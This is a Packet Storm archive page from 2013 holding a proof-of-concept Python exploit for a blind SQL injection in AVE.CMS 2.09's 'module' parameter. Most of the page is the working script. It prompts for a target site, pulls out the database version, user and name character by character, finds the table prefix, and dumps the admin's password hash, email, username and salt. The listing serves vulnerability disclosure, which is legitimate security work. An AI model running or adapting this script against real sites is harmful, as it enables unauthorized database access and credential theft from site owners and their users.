exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

AVE.CMS 2.09 Blind SQL Injection

AVE.CMS 2.09 Blind SQL Injection
Posted May 23, 2013
Authored by mr.pr0n | Site overdoze.ru

AVE.CMS versions less than 2.09 suffer from a remote blind SQL injection vulnerability in the "module" parameter. This is a proof of concept exploit. This issue is addressed in later versions.

tags | exploit, remote, sql injection, proof of concept
SHA-256 | a58ccee98e2766a83b2334654aae4e4bd323c91cb8f725358879fb1018be8100

AVE.CMS 2.09 Blind SQL Injection

Change Mirror Download
#!/usr/bin/env python

import urllib, sys, time

#######################################################################################
# Exploit Title: AVE.CMS <= 2.09 - Remote Blind SQL Injection Exploit
# Date: 23/05/2013
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Vendor Homepage: http://www.overdoze.ru/
# Software Link: websvn.avecms.ru/listing.php?repname=AVE.cms+2.09
# Version: V2.09 and 2.09RC2
# Tested on: Linux Debian 2.6.32-5-686
# Description: The "module" parameter is vulnerable to Blind SQL Injection.
# Solution : Update to newest version.
#######################################################################################

print "+----------------------------------------------------------+"
print "| AVE.CMS <= 2.09 - Remote Blind SQL Injection Exploit |"
print "| mr.pr0n - http://ghostinthelab.wordpress.com |"
print "+----------------------------------------------------------+"

##
GREEN = '\033[32m'
RESET = '\033[0;0m'
##

########
true = "404"
min = 32
max = 127
num_of_ltr = 50
########

url = raw_input("\nEnter the address of the target AVE.CMS\n> ")
if url[:7] != "http://":
url = "http://" + url + "/index.php?module="
else:
url = url + "/index.php?module="

database = []
options = {'Version':'VERSION', 'User':'CURRENT_USER', 'Database':'DATABASE'}
sys.stdout.write("[+] Checking target... (please wait)...")
for element in options:
sys.stdout.write("\n [!] Database "+element+" : ")
for letter in range(1, num_of_ltr):
for i in range(min, max):
query = "-1%00' OR ORD(MID(("+options[element]+"()),"+str(letter)+",1))>"+str(i)+"#"
target = url + query
result = urllib.urlopen(target).read()
if result.find(true) != -1:
if options[element] == "DATABASE":
database.append(chr(i))
sys.stdout.write(GREEN+chr(i)+RESET)
sys.stdout.flush()
break
time.sleep(1)
database = [i for i in database if i != ' ']
database = ''.join(database)
hexdatabase = database.encode("hex")

prefix = []
sys.stdout.write("\n[+] Checking for (random) Table Prefix... (please wait)... ")
sys.stdout.write("\n [!] Table Prefix (for '"+GREEN+database+RESET+"' database) : ")
for letter in range(1, num_of_ltr):
for letter2 in range(1, 7):
for i in range(min, max):
query = "-1%00' OR ORD(MID((SELECT CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x"+hexdatabase+" LIMIT "+str(letter)+",1),"+str(letter2)+",1))>"+str(i)+"#"
target = url + query
result = urllib.urlopen(target).read()
if result.find(true) != -1:
prefix.append(chr(i))
sys.stdout.write(GREEN+chr(i)+RESET)
sys.stdout.flush()
break
time.sleep(1)
break
prefix = [i for i in prefix if i != ' ']
prefix = ''.join(prefix)

columns = {'Password':'password','Email':'email','Username':'user_name','Salt':'salt'}
sys.stdout.write("\n[+] Dumping '"+GREEN+prefix+"users"+RESET+"' table... (please wait)...")
for element in columns:
sys.stdout.write("\n [!] Column : "+element+" : ")
for letter in range(1, num_of_ltr):
for i in range(min, max):
query = "-1%00' OR ORD(MID((SELECT CONCAT("+columns[element]+") FROM "+database+"."+prefix+"users ORDER BY Id LIMIT 0,1),"+str(letter)+",1))>"+str(i)+"#"
target = url + query
result = urllib.urlopen(target).read()
if result.find(true) != -1:
sys.stdout.write(GREEN+chr(i)+RESET)
sys.stdout.flush()
break
time.sleep(1)

sys.stdout.write("\n[+] End of POC...\n")
#eof
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close